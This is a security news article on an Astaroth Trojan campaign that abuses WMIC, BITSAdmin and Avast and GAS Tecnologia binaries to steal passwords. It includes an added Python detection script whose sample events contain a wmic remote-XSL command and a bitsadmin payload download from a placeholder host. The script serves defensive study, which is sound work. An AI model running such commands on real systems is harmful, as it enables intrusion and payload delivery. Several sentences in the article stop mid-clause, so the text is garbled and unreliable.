Researchers at Cybereason’s Nocturnus team have uncovered a new Astaroth Trojan campaign that is currently exploiting the Avast antivirus and security software developed by GAS Tecnologia to steal information and drop malicious modules.
“The campaign exploits legitimate operating system processes as well as security vendor products from companies like Avast and GAS Tecnologia to gain information about the target machine and steal password information, as well as
The Astaroth Trojan was first spotted by security firm Cofense in late 2018 when it was involved in a campaign targeting Europe and Brazil. The malware abused living-off-the-land binaries (LOLbins) such as the command line interface of the Windows Management Instrumentation Console (WMIC) to download and install malicious payloads in the background. According to the experts,
BITSAdmin is a command-line tool that can be used to create download or upload jobs and monitor their progress.
This Astaroth Trojan is distributed through spam campaigns; the malicious messages use a .7zip file as an attachment or include a hyperlink that points to the archive.
The .7zip archive contains a .lnk file which will instantiate a wmic.exe process that will “initialize an XSL Script Processing attack.”
The malware uses BITSAdmin to fetch a payload from another command-and-control server; this malicious code is disguised as images or files without extensions and contains various Astaroth modules.
The malware also injects a malicious module in the aswrundll.exe Avast Software Runtime Dynamic Link Library used by the Avast antivirus. This code is used to gather information about the compromised system and to load extra modules.
The choice of Avast is effective because the Avast engine is the most common antivirus in the world. Avast pointed out that this is neither injection nor privilege escalation: attackers are using an Avast file to run a binary, much as a DLL can be run with Windows’ rundll32.exe. Avast had issued a detection for the malware and
The Astaroth Trojan sample analyzed by the experts also exploits the unins000.exe process of a security solution developed by GAS Tecnologia.
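The chain described above (a .lnk launching wmic.exe for XSL script processing, BITSAdmin pulling the next stage, and an antivirus helper binary loading the payload) leaves a recognisable trail in process-creation telemetry. The following detection logic is an added example written for this article, not code from Cybereason, Avast or GAS Tecnologia. The events it scans are constructed for illustration (the `example.invalid` host and all paths are placeholders), and the field names, the set of suspicious parent processes and the assumption that `AvastSvc.exe` is a legitimate parent for `aswrundll.exe` are assumptions of this example rather than facts from the report.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon-like field names, an assumption)."""
    image: str         # executable that started
    parent_image: str  # executable that started it
    cmdline: str       # full command line


URL_RE = re.compile(r"https?://", re.IGNORECASE)

# Parents from which an AV helper binary should not normally be spawned.
# wmic.exe and bitsadmin.exe come from the article; the rest are assumptions.
LOLBIN_PARENTS = {"wmic.exe", "bitsadmin.exe", "cmd.exe", "powershell.exe"}


def basename(path: str) -> str:
    """Case-insensitive file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_wmic_remote_xsl(e: ProcEvent) -> bool:
    """wmic.exe told to render output with an XSL stylesheet fetched over HTTP(S)."""
    cmd = e.cmdline.lower()
    return basename(e.image) == "wmic.exe" and "/format:" in cmd and bool(URL_RE.search(cmd))


def rule_wmic_under_explorer(e: ProcEvent) -> bool:
    """A double-clicked shortcut runs under explorer.exe; wmic.exe there is unusual."""
    return basename(e.image) == "wmic.exe" and basename(e.parent_image) == "explorer.exe"


def rule_bitsadmin_download(e: ProcEvent) -> bool:
    """bitsadmin.exe creating a transfer job that points at a remote URL."""
    cmd = e.cmdline.lower()
    return basename(e.image) == "bitsadmin.exe" and "/transfer" in cmd and bool(URL_RE.search(cmd))


def rule_av_helper_under_lolbin(e: ProcEvent) -> bool:
    """aswrundll.exe / unins000.exe started by a living-off-the-land binary."""
    return basename(e.image) in {"aswrundll.exe", "unins000.exe"} and \
        basename(e.parent_image) in LOLBIN_PARENTS


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("wmic_remote_xsl", rule_wmic_remote_xsl),
    ("wmic_under_explorer", rule_wmic_under_explorer),
    ("bitsadmin_download", rule_bitsadmin_download),
    ("av_helper_under_lolbin", rule_av_helper_under_lolbin),
]


def scan(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule each event triggers."""
    hits = []
    for idx, event in enumerate(events):
        for name, predicate in RULES:
            if predicate(event):
                hits.append((idx, name))
    return hits


# Constructed sample telemetry: two benign events (0 and 4) and three that
# mirror the stages described in the article (1, 2 and 3).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wbem\WMIC.exe", r"C:\Windows\System32\cmd.exe",
              "wmic os get caption"),
    ProcEvent(r"C:\Windows\System32\wbem\WMIC.exe", r"C:\Windows\explorer.exe",
              'wmic.exe os get /format:"http://example.invalid/stage.xsl"'),
    ProcEvent(r"C:\Windows\System32\bitsadmin.exe", r"C:\Windows\System32\wbem\WMIC.exe",
              r"bitsadmin /transfer upd /download /priority high "
              r"http://example.invalid/pic.jpg C:\Users\Public\pic.bin"),
    ProcEvent(r"C:\Program Files\AVAST Software\Avast\aswrundll.exe",
              r"C:\Windows\System32\wbem\WMIC.exe", "aswrundll.exe <arguments omitted>"),
    ProcEvent(r"C:\Program Files\AVAST Software\Avast\aswrundll.exe",
              r"C:\Program Files\AVAST Software\Avast\AvastSvc.exe",
              "aswrundll.exe <arguments omitted>"),  # assumed legitimate parent
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} -> {SAMPLE_EVENTS[idx].cmdline}")
```

Each rule is deliberately narrow so that a match is meaningful on its own; correlating them by parent-child relationship within a short window (wmic.exe under explorer.exe, then bitsadmin.exe and an AV helper under that wmic.exe) is what turns individually explainable events into the chain the article describes.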
The malware is able to log the users’ keystrokes, collect information through hooking, access clipboard content, and monitor the
The Astaroth Trojan also uses the NetPass free network password recovery tool to collect login passwords of remote computers on the LAN, passwords
“Part of the difficulty identifying this attack is in how it evades detection. It is difficult to catch, even for security teams aware of the complications ensuring a secure system, as with our customer above,” concludes Cybereason.
“LOLbins are deceptive because their execution seems benign at first, or even sometimes safe, as with the malicious use of antivirus software. As the use of LOLbins becomes more commonplace, we suspect this complex method of attack will become more common as well. The potential for damage will grow as attackers will look to other more destructive payloads.”